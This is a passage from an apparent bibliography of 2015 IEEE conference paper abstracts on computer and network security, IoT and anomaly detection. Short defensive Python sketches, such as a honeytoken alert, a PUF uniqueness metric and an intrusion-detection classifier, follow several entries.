URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7230840&isnumber=7230772

 

Ristov, S.; Gusev, M., "Operating System Impact on CPU and RAM Utilisation When Introducing XML Security," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 254-258, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160275

Abstract: Introducing XML security to a web service increases the message size, which impacts the XML parsing of the larger message and complicates its processing due to complex cryptographic operations. Both tasks impact the web server's CPU and RAM utilisation. The performance impact is even more pronounced when the number of concurrent messages rises rapidly. In this paper we analyze the impact of securing a web service message with XML Signature and XML Encryption on hardware performance, varying the message size and the number of concurrent messages. The results show that a web server installed on Linux utilises the CPU less than the same web server installed on Windows. The situation for RAM is the opposite: the web server installed on Windows occupies less RAM.

Keywords: Web services; cryptography; digital signatures; operating systems (computers); random-access storage; CPU utilization; Linux; RAM memory; RAM utilization; Web service; Windows; XML encryption; XML parsing; XML security; XML signature; concurrent messages; cryptographic operations; extensible markup language; operating system; random access memory; Linux; Operating systems; Random access memory; Security; Web servers; XML; CPU; Operating systems; Performance; RAM; Web service (ID#: 16-9328)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160275&isnumber=7160221

 

Hrestak, D.; Picek, S.; Rumenjak, Z., "Improving the Android Smartphone Security Against Various Malware Threats," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1290-1295, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160474

Abstract: Android is one of the most popular operating systems for mobile devices in the world today. One of its greatest advantages, being an open source operating system, also represents one of its major drawbacks. There exist a number of malicious programs that can harm devices running any operating system, including Android. Accordingly, having a secure system is a goal of paramount importance. However, the fact that improvements in security often come with a penalty in usability can present a problem. Furthermore, it is difficult to give a good answer to the question of when a system is secure enough, since that heavily depends on the user's needs. In this paper we investigate several ways to improve the security of Android devices through various customizations of the operating system or third-party applications.

Keywords: Android (operating system); invasive software; public domain software; smart phones; Android devices; Android smartphone security; malware threats; mobile devices; open source operating system; Androids; Humanoid robots; Malware; Operating systems; Smart phones (ID#: 16-9329)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160474&isnumber=7160221

 

Oksana, T., "Development System of Protection Electronic Document to Ensure the Integrity and Confidentiality of Information," in Experience of Designing and Application of CAD Systems in Microelectronics (CADSM), 2015 13th International Conference The, pp. 376-378, 24-27 Feb. 2015. doi: 10.1109/CADSM.2015.7230880

Abstract: The authors developed a mathematical model and a functional scheme for workflow systems with information protection. The system is based on a role security model and provides multiple levels of attributes for documents. The developed system ensures the availability, integrity and confidentiality of information, protecting documents from tampering. For printed documents, several levels of protection were developed, which increases the effectiveness of the system.

Keywords: data privacy; document handling; electronic document protection; information confidentiality; information integrity; mathematical model; role security model; Data models; Databases; Libraries; Mathematical model; Organizations; Security; latent images; protection of document; security printing; system protection of document (ID#: 16-9330)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7230880&isnumber=7230772

 

Petrunic, A.B.R., "Honeytokens as Active Defense," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1313-1317, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160478

Abstract: Web applications are one of the most attacked platforms today, and because of that, new ways to break into web applications are being invented almost daily, allowing attackers to steal users' personal data and credit card numbers and to conduct many other frauds related to data and applications hosted on Internet servers and databases. Some of the reasons that web applications are constantly attacked are their 24/7 availability, the mix of technologies used to provide the needed functionality, the interesting data in the backend databases, and the ease of avoiding punishment for crimes committed against web sites and website users/owners. There is also an aspect related to the cybercrime and cyber warfare that has been marching across the planet in the last few years, exposing more and more personal data in highly sophisticated and targeted attacks. This paper summarizes a few different ways that a web application could be written in order to identify, isolate and track the hacker during the attack process. The concept presented in this paper is the so-called honeytoken: a value the application keeps in databases, files, parameters, etc., which should never be changed or touched by the application in its normal lifecycle.

Keywords: Internet; Web sites; computer crime; Internet servers; Web applications; Web sites; active defense; attack process; cyber warfare; cybercrime; databases; honeytokens; Computer hacking; Databases; File systems; Firewalls (computing); IP networks; Robots; Web application security; active defense; honeytoken (ID#: 16-9331)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160478&isnumber=7160221
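
The honeytoken mechanism the paper describes is easy to make concrete: plant a decoy value that no legitimate code path ever reads, and treat any access to it as an indicator of compromise. The sketch below is a minimal illustration; the planted values and alerting transport are hypothetical.

```python
# Tiny illustration of the honeytoken idea: decoy values that no code path
# legitimately reads, wired to an alert on first touch. The planted values
# and the alert mechanism here are hypothetical placeholders.
import logging

HONEYTOKENS = {"svc_backup_admin", "4929-1875-5555-3341"}   # planted decoys

def fetch_user(username, users):
    if username in HONEYTOKENS:
        # Legitimate application logic never requests these values, so any
        # hit is treated as an indicator of compromise.
        logging.critical("HONEYTOKEN touched: %r -- possible breach", username)
        # ...here one would page the on-call, capture request context, etc.
        return None
    return users.get(username)

users = {"alice": {"role": "user"}}
fetch_user("alice", users)              # normal lookup, silent
fetch_user("svc_backup_admin", users)   # account enumeration trips the alarm
```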

 

Mispan, M.S.; Halak, B.; Chen, Z.; Zwolinski, M., "TCO-PUF: A Subthreshold Physical Unclonable Function," in Ph.D. Research in Microelectronics and Electronics (PRIME), 2015 11th Conference on, pp. 105-108, June 29 2015-July 2 2015. doi: 10.1109/PRIME.2015.7251345

Abstract: A Physical Unclonable Function (PUF) is a promising technology for comprehensive security protection in integrated circuit applications. It provides a secure method of hardware identification and authentication by exploiting inherent manufacturing process variations to generate a unique response for each device. Subthreshold Current Array PUFs, which are based on the non-linearity of currents and voltages in MOSFETs in the subthreshold region, provide higher security against machine learning-based attacks compared with delay-based PUFs. However, their implementation is not practical due to the low output voltages generated from transistor arrays. In this paper, a novel architecture for a PUF, called the "Two Chooses One" PUF or TCO-PUF, is proposed to improve the output voltage ranges. The proposed PUF shows excellent quality metrics. The average inter-chip Hamming distance is 50.23%. The reliability over temperature and ±10% supply voltage fluctuations is 91.58%. On average, the TCO-PUF also shows higher security against machine learning attacks compared to delay-based PUFs and existing designs of Subthreshold Current Array PUFs.

Keywords: MOSFET; cryptographic protocols; integrated circuit design; integrated circuit reliability; learning (artificial intelligence);security of data; MOSFET; TCO-PUF; current nonlinearity; hardware authentication; hardware identification; integrated circuit applications; interchip Hamming distance; machine learning-based attacks; security protection; subthreshold current array PUF; two chooses one physical unclonable function; Arrays; Measurement; Reliability; Security; Subthreshold current; Transistors; Modelling attacks; Physical Unclonable Function; Subthreshold (ID#: 16-9332)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7251345&isnumber=7251078
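
The uniqueness figure quoted in the abstract, an average inter-chip Hamming distance of 50.23%, is the mean fractional Hamming distance between different chips' responses to the same challenge, ideally near 50%. A small sketch of computing that metric over synthetic responses:

```python
# Sketch of the PUF uniqueness metric quoted in the abstract: mean fractional
# Hamming distance between responses of different chips to one challenge.
# The responses below are synthetic random bits, not measured PUF data.
from itertools import combinations
import random

def fractional_hd(a: str, b: str) -> float:
    return sum(x != y for x, y in zip(a, b)) / len(a)

def inter_chip_hd(responses: list[str]) -> float:
    pairs = list(combinations(responses, 2))
    return sum(fractional_hd(a, b) for a, b in pairs) / len(pairs)

# Simulated 128-bit responses from 10 chips answering the same challenge.
chips = ["".join(random.choice("01") for _ in range(128)) for _ in range(10)]
print(f"mean inter-chip HD = {inter_chip_hd(chips):.2%}")   # ideally ~50%
```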

 

Saeed, A.; Ahmadinia, A.; Just, M., "Hardware-Assisted Secure Communication for FPGA-Based Embedded Systems," in Ph.D. Research in Microelectronics and Electronics (PRIME), 2015 11th Conference on, pp. 216-219, June 29 2015-July 2 2015. doi: 10.1109/PRIME.2015.7251373

Abstract: In recent years, embedded systems have evolved rapidly and become ubiquitous, as they are found in a large number of devices. At the same time, as a result of recent technological advancements and the high demand for connectivity, such systems are particularly susceptible to security attacks. Software-based security solutions cannot provide complete protection and are relatively slow. On the other hand, hardware-assisted techniques improve execution time but still involve dedicated software modules. In this paper, we propose a hardware-based mechanism to process sensitive information in complete isolation, without requiring any software process. The proposed solution is evaluated on an image processing based authentication system and has demonstrated negligible area, power consumption and performance overhead.

Keywords: embedded systems; field programmable gate arrays; power consumption; security of data; ubiquitous computing; FPGA-based embedded systems; hardware-assisted secure communication; image processing based authentication system; performance overhead; power consumption; security attacks; software-based security solutions; ubiquitous system; Databases; Embedded systems; Hardware; Power demand; Process control; Security (ID#: 16-9333)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7251373&isnumber=7251078

 

Sanchez, I.; Satta, R.; Giuliani, R.; Baldini, G., "Detection of DECT Identity Spoofing Through Radio Frequency Fingerprinting," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1296-1301, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160475

Abstract: Digital Enhanced Cordless Telecommunications (DECT) is an European Telecommunications Standards Institute (ETSI) standard for short-range cordless communications with a large worldwide installed customer base, both in residential and enterprise environments. As in other wireless standards, the existence of active attacks against the security and privacy of the communications, involving identity spoofing, is well documented in the literature. Although the detection of spoofing attacks has been extensively investigated in the literature for other wireless protocols, such as Wi-Fi and GSM, very limited research has been conducted on their detection in DECT communications. In this paper, we describe an effective method for the detection of identity spoofing attacks on DECT communications, using a radio frequency fingerprinting technique. Our approach uses intrinsic features of the front end of DECT base stations as device fingerprints and uses them to distinguish between legitimate and spoofing devices. The results of measurement campaigns and the related analysis are presented and discussed.

Keywords: digital communication; protocols; radio networks; telecommunication security; DECT identity spoofing Detection; ETSI standard; European Telecommunications Standards Institute standard; base station; communication privacy; communication security; digital enhanced cordless telecommunication; radiofrequency fingerprinting; wireless standard; Base stations; GSM; IEEE 802.11 Standards; Radio frequency; Security (ID#: 16-9334)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160475&isnumber=7160221

 

Salunke, A.; Ambawade, D., "Dynamic Sequence Number Thresholding Protocol for Detection of Blackhole Attack in Wireless Sensor Network," In Communication, Information & Computing Technology (ICCICT), 2015 International Conference on, pp. 1-4, 15-17 Jan. 2015. doi: 10.1109/ICCICT.2015.7045745

Abstract: A Wireless Sensor Network (WSN) is a distributed wireless micro-electro-mechanical system which is deployed in hostile environments, has an inherently insecure communication medium, and is resource constrained. This makes the security of Wireless Sensor Networks challenging. The blackhole attack is a security threat which manipulates sequence numbers to degrade the performance of the WSN by increasing packet loss. In this research we present a protocol that detects manipulation of sequence numbers and thus secures the network from blackhole attack by sequence number thresholding. The significance of the protocol is that, unlike other methods, this thresholding is dynamic and carried out in real time.

Keywords: protocols; telecommunication security; wireless sensor networks; WSN; blackhole attack detection; distributed wireless microelectronic mechanical system; dynamic sequence number thresholding protocol; hostile environment; medium constraints; packet loss; resource constraints; wireless sensor network; Computers; Packet loss; Routing; Routing protocols; Security; Wireless sensor networks (ID#: 16-9335)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7045745&isnumber=7045627
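
The abstract's dynamic thresholding idea can be sketched as a sliding-window anomaly test on advertised route-reply sequence numbers: a reply whose sequence number jumps implausibly far above the running statistics is flagged as a likely blackhole. The window size and multiplier below are illustrative choices, not the paper's.

```python
# Hedged sketch of dynamic sequence-number thresholding for blackhole
# detection: keep a sliding window of recently seen sequence numbers and flag
# replies that exceed a threshold derived from the running statistics.
# Window size and multiplier k are illustrative, not taken from the paper.
from collections import deque
from statistics import mean, pstdev

class SeqNoMonitor:
    def __init__(self, window: int = 20, k: float = 3.0):
        self.recent = deque(maxlen=window)
        self.k = k

    def is_suspicious(self, seq_no: int) -> bool:
        if len(self.recent) >= 5:                       # need some history first
            # +1 keeps a floor on the spread when traffic is very uniform.
            threshold = mean(self.recent) + self.k * (pstdev(self.recent) + 1)
            if seq_no > threshold:                      # inflated blackhole-style reply
                return True                             # do not poison the baseline
        self.recent.append(seq_no)
        return False

mon = SeqNoMonitor()
for s in [101, 103, 104, 106, 108, 109]:
    mon.is_suspicious(s)                                # benign traffic builds the baseline
print(mon.is_suspicious(5000))                          # True: inflated sequence number flagged
```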

 

Bol, D.; de Streel, G.; Flandre, D., "Can We Connect Trillions of IoT Sensors in a Sustainable Way? A Technology/Circuit Perspective," in SOI-3D-Subthreshold Microelectronics Technology Unified Conference (S3S), 2015 IEEE, pp. 1-3, 5-8 Oct. 2015. doi: 10.1109/S3S.2015.7333500

Abstract: The Internet-of-Things is about to revolutionize our world with trillions of sensors to be deployed. However, this revolution raises sustainability issues at the economical, societal and environmental levels: security and privacy of the sensed data, environmental and economical costs of battery production and replacement, carbon footprint associated to the production of the sensor nodes, congestion of the RF spectrum due to numerous connected devices and electrical power consumption of the ICT infrastructure to support the Internet traffic due to the sensed data. In this paper, we show how these high-level challenges can be translated into IC design targets for three main functions of IoT nodes: digital signal processing (DSP), embedded power management (PM) and low-power wireless RF communications. We then demonstrate that CMOS technology scaling and ultra-low-voltage operation can help meeting these targets through an analysis of their benefits on simple yet representative DSP, PM and RF blocks.

Keywords: CMOS integrated circuits; Internet; Internet of Things; digital signal processing chips; electric sensing devices; integrated circuit design; low-power electronics; security of data; CMOS technology scaling; DSP; DSP block; IC design; ICT infrastructure; Internet traffic; Internet-of-Things; IoT nodes; IoT sensors; PM block; RF block; RF spectrum congestion; battery production; battery replacement; carbon footprint; digital signal processing; economical cost; economical level; electrical power consumption; embedded PM; embedded power management; environmental cost; environmental level; low-power wireless RF communication; sensed data privacy; sensed data security; sensor node production; societal level; sustainability issue; ultralow-voltage operation; CMOS integrated circuits; CMOS technology; Digital signal processing; Noise measurement; Radio frequency; Sensors; Wireless communication (ID#: 16-9336)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7333500&isnumber=7333477

 

Vitas, I.; Simunic, D.; Knezevic, P., "Evaluation of Software Defined Radio systems for Smart Home Environments," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 562-565, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160335

Abstract: Software Defined Radio systems are predicted to be the radio access networks of the next generation in all kinds of wireless communications systems. Their use is not limited to the radio front end first chosen for system operation: they can be upgraded over time as system needs change or evolve, which gives them a radio front-end flexibility never seen before in radio systems. Smart home environments, such as the eWALL system, use numerous wireless technologies to control the many appliances in them, to monitor specific health states of the people living there, and so on. Therefore, many wireless technologies have been developed solely for that purpose; the leaders among them are the ZigBee and Z-Wave technologies, which are today the standard for energy-efficient and secure wireless home automation systems. Software Defined Radio is certainly very useful for future mobile communication systems. In this work, Software Defined Radio systems are evaluated with the purpose of introducing local radio networks, based on Software Defined Radios, for use in smart home environments. The benefits and shortcomings of using Software Defined Radio in these systems are shown and evaluated.

Keywords: Zigbee; assisted living; home automation; mobile radio; next generation networks; radio access networks; software radio; Z-wave technology; ZigBee technology; future mobile communication system; next generation radio access network; smart home environment; oftware defined radio system; wireless home automation system; Assisted living; Communication system security; Logic gates; Smart homes; Software radio; Wireless communication; Wireless sensor networks; Software Defined Radio; ambient assisted living; local area networks; smart home environments; smart living; ubiquitous computing (ID#: 16-9337)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160335&isnumber=7160221

 

Milic, L.; Jelenkovic, L., "A Novel Versatile Architecture for Internet of Things," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1026-1031, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160426

Abstract: This paper presents an overview of contemporary architectures for the Internet of Things and then introduces a simple novel architecture. The main goal of the proposed architecture is to remain simple while still being applicable to any Internet of Things environment. Specific IoT applications should be implemented in the application layer, using the proposed architecture as a backbone. The proposed architecture is not yet fully defined, but the ideas on which it is based are well defined and should enable a straightforward design and implementation.

Keywords: Internet of Things; personal area networks; Internet of Things architecture; IoT; WPAN; application layer; Computer architecture; Internet; Logic gates; Protocols; Security; Sensors; Unified modeling language (ID#: 16-9338)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160426&isnumber=7160221

 

Savchenko, D.I.; Radchenko, G.I.; Taipale, O., "Microservices Validation: Mjolnirr Platform Case Study," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 235-240, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160271

Abstract: Microservice architecture is a cloud application design pattern in which the application is divided into a number of small independent services, each responsible for implementing a certain feature. The need for continuous integration of developed and/or modified microservices into the existing system requires a comprehensive validation of individual microservices and their co-operation as an ensemble with other microservices. In this paper, we provide an analysis of existing methods of cloud application testing and identify features that are specific to the microservice architecture. Based on this analysis, we propose a validation methodology for microservice systems.

Keywords: cloud computing; software architecture; Mjolnirr platform case study; cloud application design pattern; microservices validation; Computer architecture; IEC standards; ISO standards; Security; Service-oriented architecture; Testing; Cloud computing; Microservices; PaaS; Services Oriented Architecture; testing; validation (ID#: 16-9339)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160271&isnumber=7160221

 

Yafei Wu; Yongxin Zhu; Tian Huang; Xinyang Li; Xinyi Liu; Mengyun Liu, "Distributed Discord Discovery: Spark Based Anomaly Detection in Time Series," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 154-159, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.228

Abstract: The computational complexity of discord discovery is O(m²), where m is the size of the time series. Many promising methods have been proposed to address this compute-intensive problem, but they discover discords sequentially on a standalone machine. The limited computing and memory capacity of a standalone machine prevents these methods from discovering discords in large datasets in reasonable time. In this work, we propose a distributed discord discovery method. Our method is able to combine discord results from different computing nodes, which were non-combinable in the previous literature. We mitigate the memory wall by using distributed data partitioning. We implement our method on the distributed Spark computing framework and the distributed HDFS (Hadoop Distributed File System) storage platform. The implementation exhibits superior scalability and enables discord discovery in multi-dimensional time series. We evaluate our method with a terabyte-sized dataset, larger than any dataset in the previous literature. Evaluation results show that our method has a clear advantage in performance and efficiency over state-of-the-art algorithms.

Keywords: computational complexity; distributed processing; parallel processing; security of data; time series; O(m2); anomaly detection; computational complexity; distributed Hadoop distributed file system storage platform; distributed data partitioning; distributed discord discovery method; distributed spark computing framework; distributed storage platform; memory capacity hinder; multidimension time series; Acceleration; Algorithm design and analysis; Clustering algorithms; Force; microelectronics; Sparks; Time series analysis; Spark; anomaly; discord; time series (ID#: 16-9340)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336158&isnumber=7336120
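
To make the discord notion concrete, the sketch below implements the quadratic brute-force search that methods like this one parallelize; distributed variants partition these subsequence comparisons across nodes. It is a minimal plain-Python/NumPy illustration under our own naming, not the paper's Spark implementation.

```python
import numpy as np

def find_discord(series, window):
    """Brute-force time-series discord: the subsequence whose distance to
    its nearest non-overlapping neighbour is largest -- O(m^2) distance
    computations, which is the cost a distributed method spreads out."""
    m = len(series) - window + 1
    subs = np.array([series[i:i + window] for i in range(m)])
    best_idx, best_dist = -1, -1.0
    for i in range(m):
        d = np.linalg.norm(subs - subs[i], axis=1)
        d[max(0, i - window + 1):i + window] = np.inf  # exclude trivial self-matches
        nn = d.min()                                   # nearest-neighbour distance
        if nn > best_dist:
            best_idx, best_dist = i, nn
    return best_idx, best_dist

rng = np.random.default_rng(0)
ts = np.sin(np.linspace(0, 20 * np.pi, 1000)) + 0.1 * rng.standard_normal(1000)
ts[500:520] += 2.0                                     # injected anomaly
print(find_discord(ts, window=20))                     # discord found near index 500
```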

 

Stampar, M.; Fertalj, K., "Artificial Intelligence in Network Intrusion Detection," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1318-1323, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160479

Abstract: In the past, detection of network attacks was done almost solely by human operators. They watched for network anomalies at their consoles and, based on their expert knowledge, applied the necessary security measures. With the exponential growth of network bandwidth, this task slowly came to demand substantial improvements in both speed and accuracy. One proposed way to achieve this is the use of artificial intelligence (AI), a progressive and promising branch of computer science, and in particular one of its sub-fields, machine learning (ML), whose main idea is learning from data. In this paper, the authors give a general overview of AI algorithms, with the main focus on their use for network intrusion detection.

Keywords: computer network security; learning (artificial intelligence); AI algorithm; ML; artificial intelligence; expert knowledge; machine learning; network attacks detection; network bandwidth; network intrusion detection; Artificial intelligence; Artificial neural networks; Classification algorithms; Intrusion detection; Market research; Niobium; Support vector machines (ID#: 16-9341)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160479&isnumber=7160221
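
As a minimal illustration of the ML approach surveyed above, the sketch below trains a classifier on synthetic connection records. Scikit-learn is assumed to be available, and the features and their distributions are invented for the example, not drawn from the paper.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report

# Hypothetical connection-record features: duration (s), bytes sent,
# bytes received, failed logins. Labels: 0 = normal traffic, 1 = attack.
rng = np.random.default_rng(42)
X_normal = rng.normal([10, 5e3, 4e3, 0], [5, 2e3, 2e3, 0.2], (500, 4))
X_attack = rng.normal([1, 2e4, 50, 3], [1, 5e3, 30, 1.0], (500, 4))
X = np.vstack([X_normal, X_attack])
y = np.array([0] * 500 + [1] * 500)

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0)
clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_tr, y_tr)
print(classification_report(y_te, clf.predict(X_te)))
```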

 

Hodanic, D.; Vrkic, N.; Tomic, M., "Data Storage and Synchronization in Private Cloud," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 476-480, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160318

Abstract: Using cloud systems for data storage has many advantages over traditional approaches. It is already widely used and its popularity is still growing fast. The systems must be implemented and maintained in a way that not only satisfies the performance and resource availability requirements, but also fully addresses the questions of security, privacy and data ownership. Concerns over those questions very often lead to consideration of a private cloud implementation. In this paper, we explore a private cloud implementation suitable for small to medium businesses. We introduce the main types of cloud computing as basic service models and analyze the features of private cloud systems. Advantages and disadvantages in comparison to public cloud services are considered. Implementing private cloud solutions in a lab environment allowed us to examine the ease of setup and maintenance as well as the usability of the chosen solutions and their applicability for the target user group.

Keywords: cloud computing; data privacy; security of data; small-to-medium enterprises; storage management; synchronisation; cloud computing; data ownership; data storage; private cloud system; public cloud services; small to medium businesses; Cloud computing; Encryption; Organizations; Servers; Synchronization (ID#: 16-9342)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160318&isnumber=7160221

 

Krizan, T.; Brakus, M.; Vukelic, D., "In-Situ Anonymization of Big Data," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 292-298, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160282

Abstract: With organizations storing and even openly publishing their data for further processing, privacy becomes an issue. Such open data should retain its original structure while protecting sensitive personal data. Our aim was to develop fast and secure software for offline anonymization of (distributed) big data. Herein, we describe speed and security requirements for anonymization systems, popular anonymization techniques, and de-anonymization attacks. We give a detailed description of our software for in-situ anonymization of big data distributed in a cluster, tested on a real Telco customer data record (CDR) dataset of around 500 GB.

Keywords: Big Data; data privacy; security of data; CDR; anonymization attacks; deanonymization attacks; in-situ big data anonymization; offline anonymization; open data; secure software; sensitive personal data; telco customer data record dataset; Big data; Data structures; Distributed databases; Encryption; Organizations; Servers (ID#: 16-9343)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160282&isnumber=7160221
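
The following sketch illustrates two common building blocks of CDR anonymization discussed in this line of work: keyed pseudonymization of identifiers and generalization of quasi-identifying fields. The field names and record layout are hypothetical; the paper's actual software and formats are not reproduced here.

```python
import hashlib
import hmac

SECRET_KEY = b"site-local-secret"  # kept separate from the published dataset

def pseudonymize(value: str) -> str:
    """Keyed hash: a consistent pseudonym, irreversible without the key."""
    return hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()[:16]

def generalize_cell(cell_id: str) -> str:
    """Coarsen the location field to a wider area to resist re-identification."""
    return cell_id[:4] + "xxxx"

def anonymize_cdr(record: dict) -> dict:
    return {
        "caller": pseudonymize(record["caller"]),
        "callee": pseudonymize(record["callee"]),
        "cell": generalize_cell(record["cell"]),
        "duration_s": record["duration_s"],   # non-identifying field kept as-is
    }

print(anonymize_cdr({"caller": "+385911234567", "callee": "+385987654321",
                     "cell": "23051789", "duration_s": 142}))
```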

 

Bhattacharya, R.; In-Keun Baek; Jeong Seok Lee; Barik, R.K.; Seontae Kim; Dongpyo Hong; Ohjoon Kwon; Sattorov, M.A.; Yong Hyup Kim; Gun-Sik Park, "Investigation of Emission Capability of Reduced Graphene Oxide Film Cathode for Terahertz Vacuum Electron Devices," in Infrared, Millimeter, and Terahertz waves (IRMMW-THz), 2015 40th International Conference on, pp. 1-2, 23-28 Aug. 2015. doi: 10.1109/IRMMW-THz.2015.7327810

Abstract: High-power terahertz vacuum sources are in immediate demand for several applications in areas such as medicine, security and communications. The power and performance of these devices depend mainly on the cathode. As structures become smaller, it is very difficult to obtain high power at terahertz frequencies using conventional low-current-density thermionic cathodes. As a result, the development of non-conventional field-emission cathodes is in progress; these may produce a very high current density with comparatively high current and can advance terahertz research and applications. In this work, our main aim is to develop and analyze a high-current-density (>10³ A/cm²) sheet-beam film cathode using a reduced graphene oxide (rGO)-nanoparticle composite.

Keywords: current density; electron field emission; graphene; nanocomposites; nanoparticles; submillimetre wave devices; terahertz wave devices; thermionic cathodes; vacuum microelectronics; current density analysis; nanoparticle composite; nonconventional field emission cathode; rGO; reduced graphene oxide film cathode; sheet beam film cathode; terahertz vacuum electron device; terahertz vacuum source; thermionic cathode; Cathodes; Current density; Electron devices; Films; Graphene; Microscopy; Thermal stability (ID#: 16-9344)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7327810&isnumber=7327382

 

Seljan, J.; Simunic, D.; Dimic, G.; Vrandecic, B., "Towards a Self-Organizing Network: An Algorithm," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 592-595, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160341

Abstract: In this work we deal with the Achilles' heel of wireless sensor networks - energy-efficient operation. By a combined MAC/physical-layer attack on the issues contributing to energy overhead, we demonstrate the possibility of reducing the overall power consumption in a relatively straightforward way, without severe alteration of common communication protocols. Results of simulations of networks using the proposed scheme are shown, partially validating the crucial ideas behind it.

Keywords: access protocols; power aware computing; self-organising feature maps; telecommunication computing; telecommunication security; wireless sensor networks; MAC-physical layer attack; communication protocols; energy efficient operation; energy overhead; overall power consumption; self-organizing network; wireless sensor networks; Algorithm design and analysis; Monitoring; Power demand; Probabilistic logic; Routing; Standards; Wireless sensor networks (ID#: 16-9345)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160341&isnumber=7160221

 

Vukojevic, S., "Violation of User Privacy by IPTV Packet Sniffing in Home Network," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1338-1343, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160482

Abstract: The aim of this paper is to determine what can be learned, and how much information can be collected, about the habits of Internet Protocol television (IPTV) users in Croatia through unauthorised monitoring of IPTV traffic in the users' home networks. The experimental part of the presented work involves collecting IPTV traffic in the home networks of IPTV users of the two largest electronic communications operators in Croatia while performing ordinary user activities (initiating the Set Top Box (STB) devices, switching TV channels, using the EPG, recording programs, using video on demand, etc.). The paper does not explore whether and how unauthorised access to the users' home network can be achieved; instead, it is assumed that such access has already been obtained. Based on the gathered data, each user action is analysed for what it reveals about the users' behavioural habits and the violation of their privacy. The results of the conducted analysis provide an overview of the gathered information and some concluding remarks regarding the possibility of privacy violation by IPTV traffic sniffing in the user's home network.

Keywords: IPTV; computer network security; protocols; telecommunication traffic; Croatia; IPTV packet sniffing; IPTV traffic; IPTV traffic sniffing; IPTV users; Internet protocol television; STB devices; electronic communications operators; program recording; set top box; switching TV channels; unauthorised access; unauthorised monitoring; user home network; user privacy violation; users home network; Home automation; IP networks; IPTV; Protocols; Streaming media; Switches (ID#: 16-9346)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160482&isnumber=7160221

 

Hajdarevic, A.; Dzananovic, I.; Banjanovic-Mehmedovic, L.; Mehmedovic, F., "Anomaly Detection in Thermal Power Plant Using Probabilistic Neural Network," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1118-1123, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160443

Abstract: Anomalies are an integral part of every system's behavior and sometimes cannot be avoided. It is therefore very important to detect such anomalies in a running real-world power plant system in a timely manner. Artificial neural networks are one of the available anomaly detection techniques. This paper applies a probabilistic neural network to the problem of anomaly detection in selected sections of a thermal power plant: the steam superheaters and the steam drum. The inputs to the neural network are some of the most important process variables of these sections. Notably, all of the inputs are observable in the real system installed in the thermal power plant, some representing normal behavior and some anomalies. In addition to the implementation of this network for anomaly detection, the effect of key parameter changes on the anomaly detection results is also shown. The results confirm that a probabilistic neural network is an excellent solution for the anomaly detection problem, especially in real-time industrial applications.

Keywords: neural nets; power engineering computing; probability; security of data; thermal power stations; ANN; anomaly detection techniques; artificial neural networks; normal behavior; probabilistic neural network; process variables; real-time industrial applications; steam drum; steam superheaters; thermal power plant; Biological neural networks; Boilers; Power generation; Probabilistic logic; Probability density function; Training (ID#: 16-9347)

